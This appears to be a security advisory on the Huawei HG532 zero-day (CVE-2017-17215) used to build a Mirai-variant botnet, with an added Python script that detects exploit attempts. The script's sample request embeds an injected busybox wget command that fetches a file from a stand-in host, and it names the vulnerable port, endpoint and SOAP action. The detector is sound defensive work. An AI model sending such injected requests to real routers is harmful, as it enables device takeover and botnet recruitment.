Zero-Day In Huawei Routers Exploited to Create Botnet

A threat actor made hundreds of thousands of attempts to exploit a zero-day vulnerability, CVE-2017-17215, in the Huawei HG532 home router in an effort to build an updated variant of the Mirai botnet. The HG532 exposes Universal Plug and Play (UPnP) through the TR-064 technical report standard, and a command-injection flaw in that implementation allowed remote attackers to execute arbitrary commands on the device. Successful exploitation downloaded and ran the OKIRU/SATORI bot, a Mirai variant, on the compromised router. The majority of the exploit attempts were observed in the US, Italy, Germany, and Egypt. Check Point attributed the campaign to an amateur hacker operating under the handle "Nexus Zeta," which illustrates that internet-of-things (IoT) devices are at risk even from unskilled threat actors.

Check Point researchers disclosed their findings to Huawei, which has since patched the vulnerability and pushed an update to its customers.

The NJCCIC recommends that users and administrators of the Huawei HG532 home router review the Check Point report and the Huawei Security Notice and confirm that the device is running the most current firmware version; home routers do not always update themselves, so verify the installed version rather than assuming the patch is present. Additionally, all users and administrators of IoT devices, such as routers, are strongly encouraged to configure and secure devices before connecting them to a network, in particular by not exposing management services such as UPnP to the internet, and to always keep hardware and software up to date.
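As an added example (not code from the NJCCIC advisory, the Check Point report, or Huawei), the following Python script shows how a defender could flag exploitation attempts against this flaw in captured HTTP traffic. It assumes, from the public CVE record and the Check Point write-up, that the vulnerable TR-064 DeviceUpgrade service listens on TCP port 37215 and that the injected shell commands are carried in the NewStatusURL and NewDownloadURL parameters of the SOAP Upgrade action; the two sample requests are constructed for this example, and the set of shell metacharacters treated as suspicious is a heuristic chosen here, not a published signature.

```python
"""
Flag command-injection attempts against the Huawei HG532 TR-064 / UPnP
DeviceUpgrade service (CVE-2017-17215) in raw HTTP requests.

Added example; not from the NJCCIC advisory or Check Point's report.
Assumed from the public CVE record and Check Point write-up: the service
listens on TCP 37215 and the injected commands ride in the NewStatusURL /
NewDownloadURL parameters of the SOAP Upgrade action. SHELL_META is a
heuristic chosen for this example.
"""
import re
import xml.etree.ElementTree as ET

VULN_PORT = 37215
VULN_ACTION = "urn:dslforum-org:service:DeviceUpgrade:1#Upgrade"
WATCHED_PARAMS = ("NewStatusURL", "NewDownloadURL")
# Shell metacharacters that have no business in a firmware URL parameter
# (heuristic): command substitution, backticks, separators, newlines.
SHELL_META = re.compile(r"\$\(|`|;|\|\||&&|\n")


def parse_http_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def soap_params(body):
    """Return {local_name: text} for every leaf element in a SOAP body."""
    params = {}
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return params  # not XML: nothing to inspect
    for el in root.iter():
        local = el.tag.split("}")[-1]  # drop any {namespace} prefix
        if len(el) == 0 and el.text is not None:
            params[local] = el.text
    return params


def analyze_request(raw, dst_port):
    """Score one request; injected_params is the decisive signal."""
    method, path, headers, body = parse_http_request(raw)
    action = headers.get("soapaction", "").strip('"')
    injected = [
        name for name, value in soap_params(body).items()
        if name in WATCHED_PARAMS and SHELL_META.search(value)
    ]
    return {
        "port_match": dst_port == VULN_PORT and method == "POST",
        "action_match": action == VULN_ACTION,
        "path": path,
        "injected_params": injected,
    }


def is_exploit_attempt(raw, dst_port):
    """True when a watched parameter carries shell metacharacters."""
    return bool(analyze_request(raw, dst_port)["injected_params"])


def _request(status_url, download_url):
    # Constructed sample request (not a real capture).
    return (
        "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
        "Host: 192.168.1.1:37215\r\n"
        "Content-Type: text/xml\r\n"
        'SOAPAction: "urn:dslforum-org:service:DeviceUpgrade:1#Upgrade"\r\n'
        "\r\n"
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
        '<s:Body><u:Upgrade xmlns:u="urn:dslforum-org:service:DeviceUpgrade:1">'
        f"<NewStatusURL>{status_url}</NewStatusURL>"
        f"<NewDownloadURL>{download_url}</NewDownloadURL>"
        "</u:Upgrade></s:Body></s:Envelope>"
    )


# Legitimate-looking upgrade request versus one with shell substitution.
BENIGN_UPGRADE = _request("http://192.168.1.50/status", "http://192.168.1.50/fw.bin")
INJECTED_UPGRADE = _request(
    "$(/bin/busybox wget -g 192.0.2.10 -l /tmp/x -r /x)", "$(echo HUAWEIUPNP)"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_UPGRADE), ("injected", INJECTED_UPGRADE)):
        print(label, analyze_request(req, 37215))
```

A POST to port 37215 or the Upgrade action alone is not conclusive, since a LAN management client may legitimately use them; the presence of shell metacharacters in a field that should only ever hold a URL is what distinguishes an exploit attempt, so that is the field the `is_exploit_attempt` decision keys on.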